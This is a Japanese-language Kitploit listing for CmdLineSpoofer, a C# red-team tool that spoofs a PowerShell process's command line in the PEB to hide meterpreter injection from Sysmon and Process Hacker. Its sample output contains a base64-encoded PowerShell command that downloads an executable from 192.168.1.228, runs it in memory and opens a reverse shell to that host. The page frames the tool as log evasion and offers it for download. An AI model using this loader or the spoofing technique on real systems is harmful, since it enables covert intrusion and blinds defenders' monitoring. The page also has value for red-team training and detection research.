Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CmdLineSpoofer — C#から新しいプロセスを起動する際にコマンドラインを偽装する方法 | Kitploit
ツール/GitHubGitHub/plackyhacker/cmdlinespoofer
特権昇格エクスプロイトポストエクスプロイトペネトレーションテストコマンド&コントロール学習と教育レッドチーミングペイロード開発
GitHubplackyhacker/cmdlinespoofer

CmdLineSpoofer

C#から新しいプロセスを起動する際にコマンドラインを偽装する方法

リポジトリを見る
112184年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Command Line Spoofer

C# を使用して meterpreter シェルを注入し、コマンドラインを偽装する例です。コマンドラインはプロセス環境ブロック (PEB) に保存され、新しいプロセスが開始されるとログに記録され、Process Hacker やタスクマネージャーなどのツールに表示されます。

はじめに

このコードは、Adam Chester/XPN による How to Argue like Cobalt Strike ブログ記事に基づいています。この記事では、Cobalt Strike がビーコンを注入する際に、どのようにしてプロセスのコマンドラインを偽装するかが説明されています。

これを基に、PowerShell プロセスを生成し、meterpreter リバースシェルを注入する C# バージョンを作成しました。.Net バイナリでこれを行う必要は確かにありませんが、コマンドをどのように偽装できるかを示しています。

新しいプロセスは中断状態で、偽装されたコマンドライン引数とともに起動されます。

偽装されたコマンドはログに記録されますが、プロセス PEB 内のコマンドラインを変更することができます。メインスレッドが再開されると、プロセスは PEB 内の新しいコマンドラインを使用します。

例

コードの実行例を以下に示します。

root@kitploit:~
[+] Spoofing command: powershell.exe nothing to see here! :-P
[+] Process spawned, PID: 8588
[+] PEB Address: 0x2B2366F000
[+] ProcessParameters Address: 0x1EF61560000
[+] CommandLine Address: 0x1EF615606BC
[+] Original CommandLine: powershell.exe nothing to see here! :-P                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
[+] New CommandLine: powershell.exe -exec bypass -enc WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMgAyADgALwBwAC4AZQB4AGUAIgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAKAAsACAAWwBzAHQAcgBpAG4AZwBbAF0AXQAgACgAJwAxADkAMgAuADEANgA4AC4AMQAuADIAMgA4ACcALAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAUABJAEQALAAgACcAMQAwACcAKQApACkAOwB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADAAMAB9AA== , written to process
[+] Resuming process

この例では、PowerShell を使用して meterpreter リバースシェルを注入していますが、偽装されたコマンドライン引数でログに記録されます。

概念実証

Sysmon は元の (偽装された) コマンドラインをログに記録します。

Sysmon

Process Hacker は実行されたコマンドを明らかにしません。

Process Hacker

ツールをダウンロード